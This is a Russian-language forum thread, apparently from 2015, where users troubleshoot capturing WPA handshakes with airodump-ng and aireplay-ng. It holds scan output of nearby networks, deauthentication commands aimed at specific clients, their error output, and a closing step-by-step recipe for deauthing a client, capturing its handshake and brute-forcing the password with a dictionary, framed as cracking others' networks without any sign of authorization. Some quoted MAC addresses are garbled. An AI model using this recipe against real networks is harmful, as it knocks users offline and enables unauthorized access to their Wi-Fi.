(not associated)  A8:96:8A:8F:01:FA  -65  0 - 1  0  4

(not associated)  60:21:C0:80:A1:D4  -65  0 - 1  0  2

(not associated)  18:67:B0:81:6D:05  -65  0 - 1  0  3  514KZ

(not associated)  74:E1:B6:C3:88:82  -67  0 - 1  0  2  DLink

(not associated)  68:17:29:EE:40:B7  -67  0 - 1  0  1

(not associated)  CC:3A:61:EA:D6:51  -67  0 - 1  0  5

(not associated)  CA:48:E9:2F:54:0B  -67  0 - 1  0  2

(not associated)  74:F0:6D:75:72:74  -67  0 - 1  0  2

(not associated)  00:26:82:65:8F:91  -65  0 - 1  30  24

(not associated)  A4:C3:61:58:30:58  -67  0 - 1  0  3

(not associated)  DC:85:DE:25:8B:1A  -67  0 - 1  0  2  ASUS

(not associated)  40:2C:F4:02:19:EE  -67  0 - 1  0  1

(not associated)  44:6D:57:87:BF:7B  -67  0 - 1  0  7

(not associated)  50:B7:C3:DE:3A:EB  -69  0 - 1  0  7

(not associated)  9C:A9:E4:B8:64:C4  -69  0 - 1  0  1

(not associated)  20:02:AF:30:82:4C  -69  0 - 1  0  7

(not associated)  48:5D:60:88:2C:68  -69  0 - 1  0  1

(not associated)  34:23:BA:4C:D8:94  -69  0 - 1  0  9

(not associated)  74:F0:6D:92:2C:D2  -69  0 - 1  0  1

(not associated)  8C:FA:BA:B8:44:9B  -69  0 - 1  0  2

То что я вижу, этим ты хешики не поймаешь.

Василий-Шишкин

12.05.2015 12:37

Цитата:

Сообщение от BabaDook

BabaDook said:
↑
То что я вижу, этим ты хешики не поймаешь.

Это вывод команды: airodump-ng mon0.

Не я же диктую линексу что выводить, что я увидел, то я и написал сюда.

BabaDook

12.05.2015 12:38

Цитата:

Сообщение от Василий-Шишкин

Василий-Шишкин said:
↑
Это вывод команды: airodump-ng mon0

Я по логам вижу. Я ещё раз повторю. Такой командой ВЫ хандшайк не поймайте.

Василий-Шишкин

12.05.2015 12:39

Цитата:

Сообщение от BabaDook

BabaDook said:
↑
То что я вижу, этим ты хешики не поймаешь.

Цитата:

Сообщение от BabaDook

BabaDook said:
↑
Я по логам вижу. Я ещё раз повторю. Такой командой ВЫ хандшайк не поймайте.

А как надо? Есть какой-нибудь может другой способ.

BabaDook

12.05.2015 12:41

Цитата:

Сообщение от Василий-Шишкин

Василий-Шишкин said:
↑
А как надо? Есть какой-нибудь может другой способ.

я в статье описал метод ловли

BabaDook

12.05.2015 12:55

airodump-ng --bssid CC:5D:4EA:11:C8 -c1 -w hachthis mon0 эта команда верная

aireplay-ng --deauth 5 -a 20:CF:306:46B -c 9C:AD:97:4D:37:19 mon0 эта нет

Я не увидел где у тебя там клиент есть. ткни меня носов в это.

Василий-Шишкин

12.05.2015 14:06

Цитата:

Сообщение от BabaDook

BabaDook said:
↑
airodump-ng --bssid CC:5D:4E
A:11:C8 -c1 -w hachthis mon0 эта команда верная
aireplay-ng --deauth 5 -a 20:CF:30
6:46
B -c 9C:AD:97:4D:37:19 mon0 эта нет
Я не увидел где у тебя там клиент есть. ткни меня носов в это.

В смысле? aireplay-ng программа для отключенния клиентов от сети, а airodump-ng для мониторинга (сканирования) роутеров. И они оба правельны ( на мой взгляд, потому что не я их придумал, взял с этого же форума"Античат").

BabaDook

12.05.2015 14:11

aireplay-ng --deauth 5 -a 20:CF:306:46B -c 9C:AD:97:4D:37:19 mon0 -- какой результат работы этой команды ? Возможно когда писали мануалы был бак трак

Василий-Шишкин

12.05.2015 14:33

Цитата:

Сообщение от BabaDook

BabaDook said:
↑
aireplay-ng --deauth 5 -a 20:CF:30
6:46
B -c 9C:AD:97:4D:37:19 mon0 -- какой результат работы этой команды ? Возможно когда писали мануалы был бак трак

Выше уже описывал:

Цитата:

Сообщение от None

Не могу отключить их пишет:

Код:

Code:

root@kali-Linux:~# aireplay-ng --deauth 5 -a 20:CF:30:D6:46:DB -c 9C:AD:97:4D:37:19 mon0

07:55:13 Waiting for beacon frame (BSSID: 20:CF:30:D6:46:DB) on channel -1

07:55:13 Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch

Please specify an ESSID (-e).

если добовляю essid, то:

Код:

Code:

root@kali-Linux:~# aireplay-ng --deauth 5 -e JackVorobey -a 20:CF:30:D6:46:DB -c 9C:AD:97:4D:37:19 mon0

08:02:06 Waiting for beacon frame (BSSID: 20:CF:30:D6:46:DB) on channel -1

08:02:06 Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch

V777	13.05.2015 23:20

Цитата:

Сообщение от Василий-Шишкин

Василий-Шишкин said:
↑
Выше уже описывал:

Советую Вам wifislax для начала, там намного проще и больше (шансов поймать хендшейк ) утилит. По моему для вардрайвинга софта проще нет и переведен на русский . /threads/423233/

Destroy525

13.05.2015 23:59

Цитата:

Сообщение от BabaDook

BabaDook said:
↑
я в статье описал метод ловли

Попробую передать мой опыт, так скажем первые шаги...

Я делал по такой инструкции:

1. airmon-ng start wlan0

2. airodump-ng mon0

3. airodump-ng -w (name of target) -c (channel) --bssid (target mac address) mon0

4. aireplay-ng wlan0 --deauth 5 -a (mac bssid) -c (mac client) mon0

после этой команды клиент должен отвалится и заново аутонтифицироваться.

после последней команды мониторим ситуацию с хендшейком. я с первой попытки выудил 2 хендшейка подряд. позже наудивление сбрутил пассы один за 10 мин, второй за 2.5 часа работы со штатным словарем с инета, скорость перебора составила в районе 11000 паролей в сек. Все работает, нужно понимачть что делаешь. А не просто копировать.

честно говоря не помню откуда взял словарик но он меня порадовал.

Время: 08:05

Страница 1 из 2

Показывать 40 сообщений этой темы на одной странице